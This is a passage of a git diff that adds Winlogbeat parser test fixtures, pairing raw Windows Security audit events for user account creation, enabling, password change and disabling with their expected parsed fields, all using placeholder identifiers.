"Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..96e08b538 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json @@ -0,0 +1,127 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": "0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..94bd16fdf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json @@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..34874fdfb --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json @@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..31cca5f97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json @@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hos